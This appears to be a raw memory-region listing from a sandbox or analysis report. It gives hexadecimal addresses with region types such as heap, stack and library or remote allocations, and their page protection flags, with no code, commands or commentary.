trusted library allocation
page read and write
1B960000
trusted library allocation
page read and write
22BF7BFD000
heap
page read and write
22BF7C75000
heap
page read and write
27474C14000
heap
page read and write
1B018B1F000
heap
page read and write
22BF7C68000
heap
page read and write
1AC81000
heap
page read and write
1AB60000
trusted library allocation
page read and write
22BF7C48000
heap
page read and write
1ADD0000
heap
page read and write
27474F83000
heap
page read and write
22BF7A99000
heap
page read and write
22BF7C48000
heap
page read and write
1AB70000
trusted library allocation
page read and write
2DF0000
trusted library allocation
page read and write
22BF859C000
heap
page read and write
7FF887CB0000
trusted library allocation
page read and write
22BF7C77000
heap
page read and write
2B90000
heap
page read and write
1B7AC000
heap
page execute and read and write
23D20D49000
unkown
page read and write
1AA60000
trusted library allocation
page read and write
1B018B6A000
heap
page read and write
7FF887D10000
trusted library allocation
page read and write
765000
stack
page read and write
1B480000
trusted library allocation
page read and write
1ABA0000
trusted library allocation
page read and write
1E87A1A6000
heap
page read and write
1AC98000
heap
page read and write
23D20D5C000
unkown
page read and write
1AB40000
trusted library allocation
page read and write
2A5A9100000
heap
page read and write
1AB40000
trusted library allocation
page read and write
1B580000
heap
page execute and read and write
C6A000
heap
page read and write
1AB40000
trusted library allocation
page read and write
22BF7C4F000
heap
page read and write
7DF4700F0000
trusted library allocation
page execute and read and write
2603000
heap
page read and write
C74000
stack
page read and write
7FF887D70000
trusted library allocation
page read and write
22BF7C37000
heap
page read and write
22BF8543000
heap
page read and write
2745E24F000
trusted library allocation
page read and write
22BF85EC000
heap
page read and write
1AB40000
trusted library allocation
page read and write
22BF85E4000
heap
page read and write
1AB77000
trusted library allocation
page read and write
1B7D0000
trusted library allocation
page read and write
2B31000
heap
page read and write
A48907E000
stack
page read and write
1CB6350E000
heap
page read and write
7FF887DA0000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
1CB495E0000
heap
page readonly
1ABC0000
trusted library allocation
page read and write
7FF887A4D000
trusted library allocation
page execute and read and write
22BF86FA000
heap
page read and write
22BF86FA000
heap
page read and write
1BA50000
trusted library allocation
page read and write
1BBB0000
trusted library allocation
page read and write
1AAE0000
trusted library allocation
page read and write
1AB61000
trusted library allocation
page read and write
1AA73000
trusted library allocation
page read and write
1BAD0000
trusted library allocation
page read and write
1B532000
trusted library allocation
page read and write
7FF887C21000
trusted library allocation
page read and write
27474884000
heap
page read and write
2B8D000
stack
page read and write
44D28FD000
stack
page read and write
1B9E0000
trusted library allocation
page read and write
CA8000
heap
page read and write
1AB63000
trusted library allocation
page read and write
22BF7A15000
heap
page read and write
CEB000
heap
page read and write
1CB4D0B6000
trusted library allocation
page read and write
2745A7E1000
heap
page read and write
5941000
heap
page read and write
7FF887CE0000
trusted library allocation
page read and write
1B018690000
heap
page read and write
7FF887C07000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
1ACAC000
trusted library allocation
page read and write
22BF7C77000
heap
page read and write
22BF7C6A000
heap
page read and write
1AC6D000
heap
page read and write
2937000
heap
page read and write
22BF85A4000
heap
page read and write
22BF86FA000
heap
page read and write
1B00167F000
trusted library allocation
page read and write
22BF8533000
heap
page read and write
2650000
heap
page read and write
23D20FF0000
unkown
page read and write
1CB4B080000
heap
page execute and read and write
22BF8594000
heap
page read and write
2F51000
trusted library allocation
page read and write
7FF8DF000000
unkown
page readonly
22BF7C3F000
heap
page read and write
7FF887DC9000
trusted library allocation
page read and write
7FF887B26000
trusted library allocation
page execute and read and write
1AB0D000
stack
page read and write
2745A7FE000
heap
page read and write
7FF887A82000
trusted library allocation
page read and write
1B790000
trusted library allocation
page read and write
E445B4B000
stack
page read and write
7FF887A42000
trusted library allocation
page read and write
23D20DB0000
heap
page read and write
22BF7C1F000
heap
page read and write
2294000
heap
page read and write
1AD0A000
heap
page read and write
7FF78289D000
direct allocation
page execute and read and write
7FF887A20000
trusted library allocation
page read and write
22BF7A0A000
heap
page read and write
12399000
trusted library allocation
page read and write
1B490000
trusted library allocation
page read and write
A48A18E000
stack
page read and write
22BF7C48000
heap
page read and write
7FF887D26000
trusted library allocation
page read and write
1CB49455000
heap
page read and write
7FF887B06000
trusted library allocation
page execute and read and write
2811000
heap
page read and write
22BF7AAB000
heap
page read and write
170000
heap
page read and write
1AB70000
trusted library allocation
page read and write
C69000
heap
page read and write
22BF7AA8000
heap
page read and write
1B0000D0000
trusted library allocation
page read and write
27474B00000
heap
page read and write
5965000
heap
page read and write
22BF7A03000
heap
page read and write
1AB70000
trusted library allocation
page read and write
2946000
heap
page read and write
22BF7C83000
heap
page read and write
22BF7A0F000
heap
page read and write
552000
heap
page read and write
22BF85BD000
heap
page read and write
22BF7C77000
heap
page read and write
1CB494B6000
heap
page read and write
1BA20000
trusted library allocation
page read and write
22BF85A4000
heap
page read and write
7FF887C50000
trusted library allocation
page read and write
22BF7C48000
heap
page read and write
22BF86FA000
heap
page read and write
1B6D0000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
B30000
heap
page read and write
1BA80000
trusted library allocation
page read and write
22BF8535000
heap
page read and write
7FF887B40000
trusted library allocation
page execute and read and write
1CB494E4000
heap
page read and write
1B910000
trusted library allocation
page read and write
22BF85CD000
heap
page read and write
1B018790000
heap
page execute and read and write
1AB40000
trusted library allocation
page read and write
22BF85CC000
heap
page read and write
1CB5B152000
trusted library allocation
page read and write
1ACAF000
heap
page read and write
1BAB0000
trusted library allocation
page read and write
22BF7C83000
heap
page read and write
1AB43000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
1B00153A000
trusted library allocation
page read and write
22BF7A79000
heap
page read and write
1CB6344F000
heap
page read and write
7FF887A74000
trusted library allocation
page read and write
22BF859C000
heap
page read and write
7FF8DF02D000
unkown
page readonly
22BF85CD000
heap
page read and write
1B001CC5000
trusted library allocation
page read and write
22BF7A06000
heap
page read and write
1E879EA0000
heap
page read and write
1B001179000
trusted library allocation
page read and write
1ACA4000
heap
page read and write
1BCF0000
trusted library allocation
page read and write
7FF887C03000
trusted library allocation
page read and write
22BF7C0F000
heap
page read and write
22BF7C1F000
heap
page read and write
1AB43000
trusted library allocation
page read and write
22BF7CC0000
unkown
page read and write
1B7B0000
trusted library allocation
page read and write
1ACC0000
trusted library allocation
page read and write
1AB50000
trusted library allocation
page read and write
22BF85F1000
heap
page read and write
1AADAEA0000
heap
page read and write
27474F30000
heap
page read and write
2746C707000
trusted library allocation
page read and write
1CB49474000
heap
page read and write
1ADF3000
heap
page read and write
274747EA000
heap
page read and write
2745C225000
heap
page read and write
22BF7C6A000
heap
page read and write
22BF85D4000
heap
page read and write
22BF7C68000
heap
page read and write
1B550000
trusted library allocation
page read and write
22BF85BC000
heap
page read and write
23D22AA1000
heap
page read and write
1BA00000
trusted library allocation
page read and write
B78000
stack
page read and write
1AA60000
trusted library allocation
page read and write
7FF887C90000
trusted library allocation
page read and write
274747A0000
heap
page read and write
1AB60000
trusted library allocation
page read and write
1EC0000
trusted library allocation
page read and write
1AAA0000
trusted library allocation
page read and write
7FF887A70000
trusted library allocation
page read and write
7FF887C70000
trusted library allocation
page read and write
1B920000
trusted library allocation
page read and write
24A2C840000
heap
page read and write
A708BFE000
stack
page read and write
22BF7A28000
heap
page read and write
1AA60000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
2F30000
heap
page execute and read and write
22BF7C75000
heap
page read and write
7FF887D00000
trusted library allocation
page read and write
22BF85D4000
heap
page read and write
7FF78288D000
direct allocation
page execute and read and write
2745C48A000
trusted library allocation
page read and write
22BF7C83000
heap
page read and write
1B693000
heap
page read and write
22BF7C40000
heap
page read and write
1AB50000
trusted library allocation
page read and write
1BB30000
trusted library allocation
page read and write
22BF7A3C000
heap
page read and write
1B550000
trusted library allocation
page read and write
1E87A070000
heap
page read and write
2A90000
heap
page read and write
22BF7ABB000
heap
page read and write
1B9A0000
trusted library allocation
page read and write
1ADD0000
heap
page read and write
2A5A90F0000
heap
page readonly
1AB40000
trusted library allocation
page read and write
A70913E000
stack
page read and write
1AB90000
trusted library allocation
page read and write
23D20DF0000
trusted library allocation
page read and write
23D20E00000
direct allocation
page execute and read and write
7FF887A60000
trusted library allocation
page read and write
2288000
heap
page read and write
1AB60000
trusted library allocation
page read and write
2745AB70000
heap
page read and write
1AB60000
trusted library allocation
page read and write
2613000
heap
page read and write
1B480000
heap
page read and write
7FF887A90000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
22BF857C000
heap
page read and write
1BB40000
trusted library allocation
page read and write
22BF85CC000
heap
page read and write
7FF887D30000
trusted library allocation
page read and write
22BF7C68000
heap
page read and write
21E4000
heap
page read and write
23D22A60000
heap
page read and write
7FF887C60000
trusted library allocation
page read and write
22BF7C68000
heap
page read and write
1AC60000
trusted library allocation
page read and write
7FF887A90000
trusted library allocation
page read and write
2B0E000
stack
page read and write
22BF7C83000
heap
page read and write
7DF431876000
unkown
page read and write
7FF887C00000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
1AB63000
trusted library allocation
page read and write
22BF85BC000
heap
page read and write
22BF5887000
heap
page read and write
1B0003C4000
trusted library allocation
page read and write
1AEA0000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
1B6B0000
trusted library allocation
page read and write
2745DF01000
trusted library allocation
page read and write
7FF8DEFB1000
unkown
page execute read
22BF7C70000
heap
page read and write
22BF7CC0000
unkown
page read and write
22BF7C4F000
heap
page read and write
24A2E343000
heap
page read and write
22BF79FB000
heap
page read and write
2699000
trusted library allocation
page read and write
22BF7C70000
heap
page read and write
22BF7C83000
heap
page read and write
22BF85EC000
heap
page read and write
22BF7C77000
heap
page read and write
AD0000
heap
page read and write
22BF7C28000
heap
page read and write
22BF7C3F000
heap
page read and write
12391000
trusted library allocation
page read and write
23D20E4B000
heap
page read and write
281E000
heap
page read and write
1AB43000
trusted library allocation
page read and write
22BF8511000
heap
page read and write
7FF887AD0000
trusted library allocation
page execute and read and write
2746C47F000
trusted library allocation
page read and write
1AB63000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
297D000
heap
page read and write
22BF858C000
heap
page read and write
12F51000
trusted library allocation
page read and write
22BF7C83000
heap
page read and write
7FF7177BC000
unkown
page readonly
23D229A1000
heap
page read and write
7FF887C80000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
1AF10000
heap
page read and write
7FF887DD0000
trusted library allocation
page read and write
2745C638000
trusted library allocation
page read and write
1BC00000
trusted library allocation
page read and write
22BF8516000
heap
page read and write
1AE50000
trusted library allocation
page read and write
22BF7C83000
heap
page read and write
7FF887C32000
trusted library allocation
page read and write
7FF887CF0000
trusted library allocation
page read and write
1B4C0000
trusted library allocation
page read and write
22BF7FA0000
unkown
page read and write
1BF92000
direct allocation
page execute and read and write
1AA70000
trusted library allocation
page read and write
22BF85BC000
heap
page read and write
7FF887E90000
trusted library allocation
page read and write
1B570000
trusted library allocation
page read and write
22BF85E4000
heap
page read and write
1AB40000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
22BF7C83000
heap
page read and write
22BF7C77000
heap
page read and write
28F0000
trusted library allocation
page read and write
22BF79FB000
heap
page read and write
7FF887B00000
trusted library allocation
page read and write
1AB8C000
heap
page execute and read and write
1B470000
trusted library allocation
page read and write
22BF85BC000
heap
page read and write
2DCD000
trusted library allocation
page read and write
22BF7C50000
heap
page read and write
22BF8523000
heap
page read and write
7FF717701000
unkown
page execute read
22BF85D4000
heap
page read and write
2A5AAC40000
heap
page read and write
22BF85E4000
heap
page read and write
1B500000
trusted library allocation
page read and write
1AB80000
heap
page execute and read and write
22BF7C77000
heap
page read and write
6A7000
unkown
page readonly
7FF887BF1000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
5AB29F4000
stack
page read and write
1B561000
direct allocation
page execute and read and write
7FF887A2D000
trusted library allocation
page execute and read and write
1B570000
trusted library allocation
page read and write
1AB70000
trusted library allocation
page read and write
1BA10000
trusted library allocation
page read and write
A708B79000
stack
page read and write
23D20E20000
heap
page read and write
22BF7C0F000
heap
page read and write
22BF85C4000
heap
page read and write
22BF7C83000
heap
page read and write
23D22990000
heap
page read and write
1B7E0000
trusted library allocation
page read and write
4AC0000
trusted library allocation
page read and write
22BF7C1F000
heap
page read and write
1AB60000
trusted library allocation
page read and write
1C580000
unkown
page read and write
1B07E2DA000
heap
page read and write
23D229B0000
heap
page read and write
5A24000
heap
page read and write
2B0F000
heap
page read and write
22BF7A03000
heap
page read and write
23D22AA0000
heap
page read and write
22BF7C75000
heap
page read and write
10D0000
heap
page read and write
22BF7A41000
heap
page read and write
22BF7A40000
heap
page read and write
22BF85CC000
heap
page read and write
22BF8016000
unkown
page read and write
1CB4C780000
trusted library allocation
page read and write
1CB49476000
heap
page read and write
22BF7C4A000
heap
page read and write
1AC0F000
trusted library allocation
page read and write
22BF7C37000
heap
page read and write
1AB40000
trusted library allocation
page read and write
7FF887B10000
trusted library allocation
page execute and read and write
7FF887F10000
trusted library allocation
page read and write
22BF7C75000
heap
page read and write
1B018789000
heap
page read and write
22BF86FA000
heap
page read and write
22BF8513000
heap
page read and write
22BF7C83000
heap
page read and write
22BF7C68000
heap
page read and write
22BF7C27000
heap
page read and write
1ABD0000
trusted library allocation
page read and write
1BBF0000
trusted library allocation
page read and write
1B970000
trusted library allocation
page read and write
23D20FF0000
trusted library allocation
page read and write
7FF887AF6000
trusted library allocation
page read and write
7FF887A72000
trusted library allocation
page read and write
2745A801000
heap
page read and write
1AB40000
trusted library allocation
page read and write
22BF7A9E000
heap
page read and write
7FF887AC6000
trusted library allocation
page read and write
22BF7C68000
heap
page read and write
A4893F9000
stack
page read and write
22BF7A07000
heap
page read and write
7DF47F060000
trusted library allocation
page execute and read and write
7FF887D40000
trusted library allocation
page read and write
1AB70000
trusted library allocation
page read and write
1AB70000
trusted library allocation
page read and write
22BF7C83000
heap
page read and write
22BF86FD000
heap
page read and write
22BF86FA000
heap
page read and write
1B018B46000
heap
page read and write
1ACB0000
trusted library allocation
page read and write
1BC90000
trusted library allocation
page read and write
22BF858C000
heap
page read and write
22BF7C48000
heap
page read and write
27474A60000
heap
page execute and read and write
2DF0000
trusted library allocation
page read and write
7FF887A6C000
trusted library allocation
page execute and read and write
22BF7C75000
heap
page read and write
7DF431870000
unkown
page read and write
7DF431880000
unkown
page read and write
1AB40000
trusted library allocation
page read and write
1B7F0000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
23D22A27000
heap
page read and write
D35000
heap
page read and write
22BF85E2000
heap
page read and write
8A9000
unkown
page readonly
22BF86FA000
heap
page read and write
1B920000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
1BAB0000
trusted library allocation
page read and write
1B07E4E0000
heap
page read and write
1AB60000
trusted library allocation
page read and write
595C000
heap
page read and write
22BF79FB000
heap
page read and write
7FF887AA0000
trusted library allocation
page read and write
22BF7C2A000
heap
page read and write
1BA30000
trusted library allocation
page read and write
22BF851C000
heap
page read and write
22BF7AAF000
heap
page read and write
22BF85EC000
heap
page read and write
1AB60000
trusted library allocation
page read and write
2B1B000
heap
page read and write
1AA60000
trusted library allocation
page read and write
2391000
trusted library allocation
page read and write
1B018B4E000
heap
page read and write
1AB60000
trusted library allocation
page read and write
22BF58A8000
heap
page read and write
1AB43000
trusted library allocation
page read and write
1B018BEF000
heap
page read and write
22BF7C83000
heap
page read and write
22BF85C4000
heap
page read and write
22BF7C7D000
heap
page read and write
1AB60000
trusted library allocation
page read and write
598A000
heap
page read and write
22BF7A05000
heap
page read and write
2A5A8FB0000
unkown
page read and write
1B790000
trusted library allocation
page read and write
22BF7E3B000
unkown
page read and write
C40000
heap
page read and write
1B610000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
22BF8543000
heap
page read and write
22BF7C83000
heap
page read and write
22BF7C77000
heap
page read and write
22BF7C6A000
heap
page read and write
1BA90000
trusted library allocation
page read and write
22BF85F1000
heap
page read and write
1ACA4000
heap
page read and write
1B5C0000
trusted library allocation
page read and write
229C000
heap
page read and write
22BF8529000
heap
page read and write
1AB40000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
22BF85E4000
heap
page read and write
1B9C0000
trusted library allocation
page read and write
22BF85D4000
heap
page read and write
22BF7C48000
heap
page read and write
22BF85DA000
heap
page read and write
22BF7C48000
heap
page read and write
1AB60000
trusted library allocation
page read and write
22BF851C000
heap
page read and write
CE0000
heap
page read and write
22BF7C48000
heap
page read and write
22BF7C77000
heap
page read and write
22BF86FA000
heap
page read and write
7FF887A23000
trusted library allocation
page execute and read and write
44D2D3E000
stack
page read and write
22BF85EC000
heap
page read and write
22BF86FA000
heap
page read and write
7FF887A14000
trusted library allocation
page read and write
1AADAFA0000
heap
page read and write
1C967000
unkown
page read and write
1B9F0000
trusted library allocation
page read and write
22BF7C27000
heap
page read and write
1AB53000
trusted library allocation
page read and write
1AA70000
trusted library allocation
page read and write
2B16000
heap
page read and write
23D22F21000
heap
page read and write
1B930000
trusted library allocation
page read and write
1BA10000
trusted library allocation
page read and write
2E00000
trusted library allocation
page read and write
400000
unkown
page readonly
1AB57000
trusted library allocation
page read and write
22BF85CC000
heap
page read and write
A48937D000
stack
page read and write
1AB63000
trusted library allocation
page read and write
1E879DC1000
remote allocation
page execute and read and write
1CB4C7A0000
trusted library allocation
page read and write
22BF79F9000
heap
page read and write
7FF887DC0000
trusted library allocation
page read and write
250E000
stack
page read and write
24A2C938000
heap
page read and write
22BF8594000
heap
page read and write
22BF7C57000
heap
page read and write
22BF7C08000
heap
page read and write
22BF7AAB000
heap
page read and write
1AB43000
trusted library allocation
page read and write
2E00000
trusted library allocation
page read and write
22BF7C80000
heap
page read and write
1AB40000
trusted library allocation
page read and write
A4892F9000
stack
page read and write
22BF85EC000
heap
page read and write
22BF7C67000
heap
page read and write
7FF887C04000
trusted library allocation
page read and write
A709C0B000
stack
page read and write
22BF7A40000
heap
page read and write
1ACAA000
heap
page read and write
1B71E000
stack
page read and write
1B000060000
trusted library allocation
page read and write
7FF887C10000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
1AB20000
trusted library allocation
page read and write
22BF7C75000
heap
page read and write
2745DF71000
trusted library allocation
page read and write
1B560000
direct allocation
page execute and read and write
22BF79FB000
heap
page read and write
2DE3000
trusted library allocation
page read and write
22BF7C83000
heap
page read and write
22BF85CC000
heap
page read and write
1AC15000
trusted library allocation
page read and write
A7091BB000
stack
page read and write
1E879D80000
remote allocation
page execute and read and write
1AB60000
trusted library allocation
page read and write
22BF7C3F000
heap
page read and write
7FF887EA0000
trusted library allocation
page execute and read and write
7FF887A73000
trusted library allocation
page execute and read and write
27474C81000
heap
page read and write
2745C200000
heap
page readonly
22BF85F1000
heap
page read and write
1AB63000
trusted library allocation
page read and write
7FF887D79000
trusted library allocation
page read and write
25B0000
trusted library allocation
page read and write
1AC40000
trusted library allocation
page read and write
22BF7C77000
heap
page read and write
1BA80000
trusted library allocation
page read and write
22BF7C68000
heap
page read and write
7FF887B30000
trusted library allocation
page read and write
22BF7C6A000
heap
page read and write
1AADB130000
heap
page readonly
22BF58BE000
heap
page read and write
1AB60000
trusted library allocation
page read and write
B3B000
heap
page read and write
22BF86FA000
heap
page read and write
44D2E3C000
stack
page read and write
1AB40000
trusted library allocation
page read and write
7FF887A80000
trusted library allocation
page read and write
1AB43000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
7FF887C50000
trusted library allocation
page read and write
1B7B0000
direct allocation
page read and write
23D22A16000
heap
page read and write
1B9B0000
trusted library allocation
page read and write
1B700000
trusted library allocation
page read and write
22BF58BD000
heap
page read and write
27474C67000
heap
page read and write
1B018AFE000
heap
page read and write
22BF85D4000
heap
page read and write
22BF7C0F000
heap
page read and write
22BF7AB8000
heap
page read and write
22BF85D4000
heap
page read and write
22BF85F5000
heap
page read and write
1B563000
trusted library allocation
page read and write
22BF7C27000
heap
page read and write
1AB60000
trusted library allocation
page read and write
1F0000
trusted library section
page read and write
22BF855C000
heap
page read and write
22BF58B0000
heap
page read and write
22BF7A28000
heap
page read and write
22BF7B4E000
heap
page read and write
23D229A1000
heap
page read and write
22BF7A03000
heap
page read and write
1B555000
trusted library allocation
page read and write
22BF7C83000
heap
page read and write
22BF850B000
heap
page read and write
1BC80000
trusted library allocation
page read and write
1B710000
trusted library allocation
page read and write
1AB67000
trusted library allocation
page read and write
1BBE0000
trusted library allocation
page read and write
1CB5B294000
trusted library allocation
page read and write
22BF7AAA000
heap
page read and write
1AB65000
trusted library allocation
page read and write
1BC70000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
7FF887A92000
trusted library allocation
page read and write
1B570000
trusted library allocation
page read and write
22BF79FB000
heap
page read and write
1AA60000
trusted library allocation
page read and write
22BF7AAE000
heap
page read and write
1B560000
trusted library allocation
page read and write
22BF8584000
heap
page read and write
22BF85CC000
heap
page read and write
7FF887F00000
trusted library allocation
page read and write
22BF7A99000
heap
page read and write
274747CD000
heap
page read and write
22BF7AAC000
heap
page read and write
1AF3D000
heap
page read and write
1AB40000
trusted library allocation
page read and write
26DD000
trusted library allocation
page read and write
22BF7C67000
heap
page read and write
1AB63000
trusted library allocation
page read and write
22BF7C28000
heap
page read and write
22BF7AB7000
heap
page read and write
22BF7C68000
heap
page read and write
1AC73000
heap
page read and write
22BF7C0F000
heap
page read and write
1B7C0000
trusted library allocation
page read and write
44D267E000
stack
page read and write
1B0000
heap
page read and write
B47000
heap
page read and write
22BF7C23000
heap
page read and write
2745A81F000
heap
page read and write
1AB43000
trusted library allocation
page read and write
22BF7C4F000
heap
page read and write
1AD0A000
heap
page read and write
7FF887AAC000
trusted library allocation
page execute and read and write
1B010651000
trusted library allocation
page read and write
22BF8533000
heap
page read and write
27474B03000
heap
page read and write
1B001F09000
trusted library allocation
page read and write
22BF85B4000
heap
page read and write
5A05000
heap
page read and write
2E15000
heap
page read and write
22BF7C6A000
heap
page read and write
22BF7A41000
heap
page read and write
22BF7C68000
heap
page read and write
22BF7A19000
heap
page read and write
1AB43000
trusted library allocation
page read and write
1B790000
trusted library allocation
page read and write
22BF7C83000
heap
page read and write
1CB634D6000
heap
page read and write
22BF7A47000
heap
page read and write
22BF7C37000
heap
page read and write
7DF473620000
trusted library allocation
page execute and read and write
22BF79FB000
heap
page read and write
1AB40000
trusted library allocation
page read and write
23D210D8000
heap
page read and write
22BF7AB7000
heap
page read and write
1AC50000
trusted library allocation
page read and write
1B950000
trusted library allocation
page read and write
1AF8F000
heap
page read and write
1BBD0000
trusted library allocation
page read and write
22BF85CC000
heap
page read and write
1B018AB6000
heap
page read and write
22BF7C77000
heap
page read and write
7DF406960000
trusted library allocation
page execute and read and write
2B31000
heap
page read and write
895000
unkown
page readonly
7FF887B26000
trusted library allocation
page read and write
22BF7C6A000
heap
page read and write
1B07E0C0000
heap
page read and write
22BF7C68000
heap
page read and write
1CB4C796000
trusted library allocation
page read and write
22BF85BC000
heap
page read and write
1AB40000
trusted library allocation
page read and write
7FF887A13000
trusted library allocation
page execute and read and write
22BF7C48000
heap
page read and write
1B480000
trusted library allocation
page read and write
2745D3CA000
trusted library allocation
page read and write
1B010637000
trusted library allocation
page read and write
2745C2D3000
heap
page read and write
1BB23000
trusted library allocation
page read and write
22BF7C48000
heap
page read and write
22BF85DA000
heap
page read and write
A708F3E000
stack
page read and write
22BF58AC000
heap
page read and write
7FF887ACC000
trusted library allocation
page execute and read and write
1B4D0000
trusted library allocation
page read and write
1B770000
trusted library section
page read and write
22BF58AC000
heap
page read and write
1C860000
unkown
page read and write
2BC0000
heap
page read and write
22BF7B4E000
heap
page read and write
1AC9E000
heap
page read and write
1B7E0000
trusted library allocation
page read and write
22BF85CC000
heap
page read and write
1B0187D6000
heap
page execute and read and write
897000
unkown
page read and write
7FF887C80000
trusted library allocation
page read and write
1B07E4E5000
heap
page read and write
1AA70000
trusted library allocation
page read and write
22BF7C15000
heap
page read and write
1B9D0000
trusted library allocation
page read and write
22BF7C70000
heap
page read and write
1B07E270000
heap
page read and write
1BB90000
trusted library allocation
page read and write
23D22ADE000
heap
page read and write
7FF887BE0000
trusted library allocation
page execute and read and write
22BF85D4000
heap
page read and write
2A5A8FF9000
unkown
page read and write
6A7000
unkown
page readonly
22BF85EC000
heap
page read and write
22BF85BC000
heap
page read and write
1BA60000
trusted library allocation
page read and write
7FF887C60000
trusted library allocation
page execute and read and write
7FF7177BC000
unkown
page readonly
22BF7C68000
heap
page read and write
22BF7A28000
heap
page read and write
22BF7A08000
heap
page read and write
44D23F3000
stack
page read and write
7DF470110000
trusted library allocation
page execute and read and write
1B000351000
trusted library allocation
page read and write
1B570000
trusted library allocation
page read and write
1BA20000
trusted library allocation
page read and write
1ADAE000
heap
page read and write
22BF852E000
heap
page read and write
1BBB6000
trusted library allocation
page read and write
1BB60000
trusted library allocation
page read and write
2A5A912E000
heap
page read and write
23D22AA7000
heap
page read and write
1BC03000
trusted library allocation
page read and write
7FF887B3C000
trusted library allocation
page execute and read and write
7FF887A1D000
trusted library allocation
page execute and read and write
22BF86FA000
heap
page read and write
233D000
stack
page read and write
1AA90000
trusted library allocation
page read and write
1B5B0000
trusted library allocation
page read and write
22BF7A1D000
heap
page read and write
22BF7C27000
heap
page read and write
22BF7CC0000
unkown
page read and write
22BF7C77000
heap
page read and write
22BF85B4000
heap
page read and write
44D2C3E000
stack
page read and write
1AADB165000
heap
page read and write
22BF79FB000
heap
page read and write
22BF8534000
heap
page read and write
1ACA0000
heap
page read and write
C6F000
heap
page read and write
1B820000
trusted library allocation
page read and write
1AEF0000
trusted library allocation
page read and write
150000
heap
page read and write
A4896BF000
stack
page read and write
22BF7C6A000
heap
page read and write
1CB4B671000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
1BBE0000
trusted library allocation
page read and write
1B880000
trusted library allocation
page read and write
22BF7C6A000
heap
page read and write
22BF85D4000
heap
page read and write
1AB43000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
22BF7A28000
heap
page read and write
22BF7AA8000
heap
page read and write
7FF887A2D000
trusted library allocation
page execute and read and write
22BF7C6A000
heap
page read and write
22BF7AAC000
heap
page read and write
2745C411000
trusted library allocation
page read and write
A4894BB000
stack
page read and write
7FF887B00000
trusted library allocation
page execute and read and write
2C83000
heap
page read and write
27474837000
heap
page read and write
1CB63420000
heap
page read and write
7FF782969000
direct allocation
page execute and read and write
1AB60000
trusted library allocation
page read and write
22BF79F9000
heap
page read and write
22BF85E4000
heap
page read and write
1B750000
trusted library allocation
page read and write
22BF7C6A000
heap
page read and write
F4F000
stack
page read and write
22BF85DC000
heap
page read and write
22BF7E19000
heap
page read and write
22BF851D000
heap
page read and write
22BF85B4000
heap
page read and write
22BF7C6A000
heap
page read and write
22BF85E4000
heap
page read and write
22BF858D000
heap
page read and write
22BF85BC000
heap
page read and write
22BF8543000
heap
page read and write
1AB40000
trusted library allocation
page read and write
1AB50000
trusted library allocation
page read and write
1AADAE20000
unkown
page read and write
1CB4B0E1000
trusted library allocation
page read and write
1AEC0000
trusted library allocation
page read and write
1B6A0000
trusted library allocation
page read and write
7FF887BFA000
trusted library allocation
page read and write
7FF887DA0000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
27474C59000
heap
page read and write
22BF7C28000
heap
page read and write
A7087CE000
stack
page read and write
23D229BD000
heap
page read and write
1B566000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
7FF887EE0000
trusted library allocation
page read and write
22BF85E4000
heap
page read and write
1AE48000
trusted library allocation
page read and write
1CB5B3DB000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
1B001687000
trusted library allocation
page read and write
22BF85D4000
heap
page read and write
22BF7A9E000
heap
page read and write
1B480000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
7FF8DF028000
unkown
page readonly
22BF7C48000
heap
page read and write
22BF7C48000
heap
page read and write
7FF887C00000
trusted library allocation
page execute and read and write
1CB4B16A000
trusted library allocation
page read and write
22BF86FA000
heap
page read and write
1AB60000
trusted library allocation
page read and write
22BF7C48000
heap
page read and write
22BF79FB000
heap
page read and write
22BF7C57000
heap
page read and write
22BF7A52000
heap
page read and write
1AB70000
trusted library allocation
page read and write
23D20EDB000
heap
page read and write
22BF85B4000
heap
page read and write
1B560000
trusted library allocation
page read and write
1AB40000
trusted library allocation
page read and write
22BF7C6A000
heap
page read and write
59F6000
heap
page read and write
22BF7C83000
heap
page read and write
23D229BD000
heap
page read and write
22BF85A4000
heap
page read and write
1B660000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
1B461000
trusted library allocation
page read and write
22BF85D4000
heap
page read and write
1B4DF000
trusted library allocation
page read and write
22BF85E4000
heap
page read and write
22BF7C48000
heap
page read and write
1B018BF3000
heap
page read and write
21B5000
heap
page read and write
22BF86FA000
heap
page read and write
22BF86FA000
heap
page read and write
1AB50000
trusted library allocation
page read and write
7FF887BE0000
trusted library allocation
page read and write
1AB60000
trusted library allocation
page read and write
23D229CA000
heap
page read and write
1AC92000
heap
page read and write
1B79A000
stack
page read and write
1AB40000
trusted library allocation
page read and write
1ACD1000
heap
page read and write
E445BCF000
stack
page read and write
7FF887D30000
trusted library allocation
page read and write
1AC65000
heap
page read and write
1B018BDB000
heap
page read and write
27474F49000
heap
page read and write
1AADAE7F000
unkown
page execute and read and write
22BF86FA000
heap
page read and write
22BF79FB000
heap
page read and write
22BF7C50000
heap
page read and write
1AB43000
trusted library allocation
page read and write
1AB70000
trusted library allocation
page read and write
22BF7E1B000
heap
page read and write
1B0021EA000
trusted library allocation
page read and write
22BF7C68000
